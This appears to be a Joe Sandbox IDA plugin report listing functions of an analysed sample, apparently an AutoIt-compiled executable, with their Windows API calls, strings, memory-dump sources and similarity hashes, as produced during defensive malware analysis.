Instruction ID: 82976ee106a7a0cbf8fb33bad59f64c3e664266c01889050e35e077dfc55c064
Opcode Fuzzy Hash: f404f3165a2045c73c195194a28fc91a48cec6bd203475c2c189e07888728f89
Instruction Fuzzy Hash: CC915C70600601AFDB14DF64C884B6ABBE9FF48711F20996DFD4AEB691EB70E845CB50

Function 00E2501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00E250AD

Part of subcall function 00E300F0: __87except.LIBCMT ref: 00E3012B

Strings

pow, xrefs: 00E25085, 00E250A2

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: c15018871e88e36d05c18ee6ee42866fe2eaaa13a2d7b408832a07e4f5ca1dfb
Instruction ID: 904cc596b7eb16e94838e98ee1bb223cd9d260ea21ac538ad6ae5f4753071dab
Opcode Fuzzy Hash: c15018871e88e36d05c18ee6ee42866fe2eaaa13a2d7b408832a07e4f5ca1dfb
Instruction Fuzzy Hash: 0551AF2290D9018ADB117724DE297BF2FD0AB40704F20AD59E4D5B62AADE348DD8DB82

Function 00E48584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E4862B
_memmove.LIBCMT ref: 00E48685

Strings

_, xrefs: 00E486FF, 00E4DFDC, 00E4DFF8
3c, xrefs: 00E4860C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: _memmove
String ID: 3c$_
API String ID: 4104443479-4099079164
Opcode ID: a42eff83153c2f5632c3f961f1be5060dc1f49fb7a44840bb75c63521edf1a87
Instruction ID: 5ee055a8027e540ee4e31e17a5880eb777488a4d3516dc057444bea10329d2dc
Opcode Fuzzy Hash: a42eff83153c2f5632c3f961f1be5060dc1f49fb7a44840bb75c63521edf1a87
Instruction Fuzzy Hash: FE516EB09006159FCB64CF68D980AEEB7F1FF44314F14856AE85AE7350EB30A995CB51

Function 00E597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59296,?,?,00000034,00000800,?,00000034), ref: 00E614E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E5983F

Part of subcall function 00E61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00E614B1

Part of subcall function 00E613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00E61409
Part of subcall function 00E613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E5925A,00000034,?,?,00001004,00000000,00000000), ref: 00E61419
Part of subcall function 00E613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E5925A,00000034,?,?,00001004,00000000,00000000), ref: 00E6142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E598AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E598F9

Strings

@, xrefs: 00E59911

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: b1d8254eb7d5d3ee7d05dcd09555e9f3963714a4179054a38c681e3416fc4764
Instruction ID: 918f710054ff957920c6fc630889471232f38e28b651a487d6302da371a881b8
Opcode Fuzzy Hash: b1d8254eb7d5d3ee7d05dcd09555e9f3963714a4179054a38c681e3416fc4764
Instruction Fuzzy Hash: 4F416176A0121CBFCB11DFA4CC81ADEBBB8EF49340F144199F955B7181DA706E89CBA0

Function 00E87946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E8F910,00000000,?,?,?,?), ref: 00E879DF
GetWindowLongW.USER32 ref: 00E879FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E87A0C

Strings

SysTreeView32, xrefs: 00E879B1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 026f2a09455ec386dd91e4b5df452509891ff10c19f82ada6b0cd349ac4ddc89
Instruction ID: bf741008243550f33c37f42b79dc9e2746c16576ccd212d58be7605dc215cce3
Opcode Fuzzy Hash: 026f2a09455ec386dd91e4b5df452509891ff10c19f82ada6b0cd349ac4ddc89
Instruction Fuzzy Hash: E431E031204206AFDB119F34CC45BEA77A9EB48328F205725F8BDB21E0D731EC919750

Function 00E873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E87461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E87475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E87499

Strings

SysMonthCal32, xrefs: 00E8742C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: fa41112655da22376ff784bf514e05556559fb72df5a8f6901e54fc1cc31e58a
Instruction ID: 3421b9424e6f584bc96c07c7b43f9b3d452ba4f8caf0a956b0e890b5f8cf0f69
Opcode Fuzzy Hash: fa41112655da22376ff784bf514e05556559fb72df5a8f6901e54fc1cc31e58a
Instruction Fuzzy Hash: 0B21B132500218AFDF11DF94CC46FEA3BA9EB48724F211214FE697B1D0DA75EC959BA0

Function 00E87B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E87C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E87C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E87C5F

Strings

msctls_updown32, xrefs: 00E87BC4

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: d2743bc6ba3aa942dd0596f9b8c79a70c560af66b3d7408a85d5415b3071713a
Instruction ID: 9e5a0e6d95d0633fdb613fe8b6e9a6a88693cc0be4d24f0e22019431ec3a8541
Opcode Fuzzy Hash: d2743bc6ba3aa942dd0596f9b8c79a70c560af66b3d7408a85d5415b3071713a
Instruction Fuzzy Hash: B82181B5204208AFDB10EF64DCC5DA777EDEF49358B141459FA49AB3A1CB32EC418BA0

Function 00E86CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E86D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E86D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E86D70

Strings

Listbox, xrefs: 00E86D08

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 6d45a78d992c1c4d3b43ac214e5f0705e1d9ea07a317c930a92023aecef552b8
Instruction ID: 844e243d05c41f8ba314a2fca9f3ce577f03361da85d75a7c35efe2fdd1f8c58
Opcode Fuzzy Hash: 6d45a78d992c1c4d3b43ac214e5f0705e1d9ea07a317c930a92023aecef552b8
Instruction Fuzzy Hash: 7921C232610118BFDF12AF54DC45FAB3BBAEF89754F019124F94CBB1A0C671AC5187A0

Function 00E739E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00E73A66

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Strings

, $, xrefs: 00E73AA6
%, xrefs: 00E739F4
AUTOITCALLVARIABLE%d, xrefs: 00E73A58

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%
API String ID: 3506404897-3879706725
Opcode ID: fa9510ab119590677bb08536518fe6e4a65b041b2eaf1b20e7f0be4130985f63
Instruction ID: 480e7009d64828ca54f51a452789d58559bd81fdc46a131bef0c94bda3a0f080
Opcode Fuzzy Hash: fa9510ab119590677bb08536518fe6e4a65b041b2eaf1b20e7f0be4130985f63
Instruction Fuzzy Hash: 3F218171A00219AACF10EF64CC82AAEB7F9EF44300F406455E489BB281DB30EA45DB61

Function 00E8770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E87772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E87787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E87794

Strings

msctls_trackbar32, xrefs: 00E87749

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: e280da7b56fbaac729d18ce395a26d2e74b61824db9812d4984c42a69fa3d852
Instruction ID: 03509847cc767a4d31f073cbc24ccd8e93160bd2cc4e2d9c6260a44756aed0c8
Opcode Fuzzy Hash: e280da7b56fbaac729d18ce395a26d2e74b61824db9812d4984c42a69fa3d852
Instruction Fuzzy Hash: AB113A32244208BFEF106F61CC01FDB77A9EF88B55F110129F689B60D0C272E851CB20

Function 00E26B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00E26B93
__calloc_crt.LIBCMT ref: 00E26BAC

Strings

@B, xrefs: 00E26BC3
, xrefs: 00E26BD1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: __calloc_crt
String ID: $@B
API String ID: 3494438863-460053111
Opcode ID: 6291cd4f8efc258a1d011cf6413e8f8021d4a30c8f853c1048df42f959268f8c
Instruction ID: 1f14152977951a474ec3e06d8ae419a0a5c6900e0a2784b724c91ecb4a6927c2
Opcode Fuzzy Hash: 6291cd4f8efc258a1d011cf6413e8f8021d4a30c8f853c1048df42f959268f8c
Instruction Fuzzy Hash: CCF0C872205631CFF7288F15BC51FB267E4E740330F501126E900FE1A0EB3198C646C0

Function 00E29B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00E29B94

Part of subcall function 00E29C0B: __mtinitlocknum.LIBCMT ref: 00E29C1D
Part of subcall function 00E29C0B: EnterCriticalSection.KERNEL32(00000000,?,00E29A7C,0000000D), ref: 00E29C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00E29BA4

Part of subcall function 00E29100: ___addlocaleref.LIBCMT ref: 00E2911C
Part of subcall function 00E29100: ___removelocaleref.LIBCMT ref: 00E29127
Part of subcall function 00E29100: ___freetlocinfo.LIBCMT ref: 00E2913B

Strings

8, xrefs: 00E29B85
8, xrefs: 00E29B8A, 00E29B9F, 00E29BAB

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8$8
API String ID: 547918592-2648740355
Opcode ID: 8fc0d12386165d0546b49b2b9816d984772ac3164f699d11221388fe43fa2a98
Instruction ID: b40b8151e23ae30c5be3c168a6cd1fe006f8c0e7cac48edb7103818b85fcd611
Opcode Fuzzy Hash: 8fc0d12386165d0546b49b2b9816d984772ac3164f699d11221388fe43fa2a98
Instruction Fuzzy Hash: 82E08C71943320AAEA24BBA47B83BCA66D09B40B21F20329AF049752C2CDB00440861B

Function 00E04C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E04B83,?), ref: 00E04C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E04C56

Strings

kernel32.dll, xrefs: 00E04C3F
Wow64RevertWow64FsRedirection, xrefs: 00E04C50

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
Instruction ID: bb4cf97f73a8541308a5bf156cfb1c557a77e8e2cc0d884f50e134355a187e40
Opcode Fuzzy Hash: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
Instruction Fuzzy Hash: ADD0C7B0602713CFE7209F32CA4820AB2E4AF00351B10983ED59AF61A0E670C8C0CB20

Function 00E04C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00E04BD0,?,00E04DEF,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E04C23

Strings

kernel32.dll, xrefs: 00E04C0C
Wow64DisableWow64FsRedirection, xrefs: 00E04C1D

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
Instruction ID: 9eddce74343701a350f9ea82b079258bb90d5703ed4f3c6c2ba8ad3fc876a205
Opcode Fuzzy Hash: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
Instruction Fuzzy Hash: 73D0C2B0502713CFE7206F71CA4820BB6D5EF08352B009C39D489F2190E6B0C4C0C710

Function 00E80DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00E81039), ref: 00E80DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E80E07

Strings

RegDeleteKeyExW, xrefs: 00E80E01
advapi32.dll, xrefs: 00E80DF0

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
Instruction ID: a9b27a70f9387c540527dcc8f0cc1452bb31f2193ae18962230ee5c6398c916e
Opcode Fuzzy Hash: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
Instruction Fuzzy Hash: 28D0C730581322CFCB20AF72C8082C372E4AF04342F00AC3ED58EF2152E6B0D894CB60

Function 00E790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E78CF4,?,00E8F910), ref: 00E790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E79100

Strings

GetModuleHandleExW, xrefs: 00E790FA
kernel32.dll, xrefs: 00E790E9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
Instruction ID: 533200cd1f57967598a77bcdf04500e6c68d63334fc06c64bc6b4824aaab8708
Opcode Fuzzy Hash: 7e893cc85d111e025cbd1c9d2476cb8dc6a0371b15b8695108188008e0edb80b
Instruction Fuzzy Hash: 49D01734651713CFDB209F3AE81C64676E8AF05755B52D83AD48EF6691EA70C890CB90

Function 00E41714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E41718
__swprintf.LIBCMT ref: 00E41749

Strings

WIN_XPe, xrefs: 00E41788
%.3d, xrefs: 00E41723

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: a0f29e449085c41d23ea16e2db3c2a1c42fcb1180489f18ef421e68fb9c771d9
Instruction ID: 892da340dea8c05d1158eb3680eac01bb09542408898159e4eecbb7fc84c8073
Opcode Fuzzy Hash: a0f29e449085c41d23ea16e2db3c2a1c42fcb1180489f18ef421e68fb9c771d9
Instruction Fuzzy Hash: 48D01271845219FACF109791B88C8F9737CA70A301F202593F516B2040E22597D4EA21

Function 00E5717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
Instruction ID: 2f9f8de1b0bd4a851f9359497810f04133895831cecb392288e084bea5053d13
Opcode Fuzzy Hash: 7607238fb0b8473d4e49a5bde810d915f933c1583b6bb72b1664d10b6345c646
Instruction Fuzzy Hash: 2FC1AE74A04216EFCB14CFA4D884EAEBBB5FF48315B109998EC95EB250D730ED85DB90

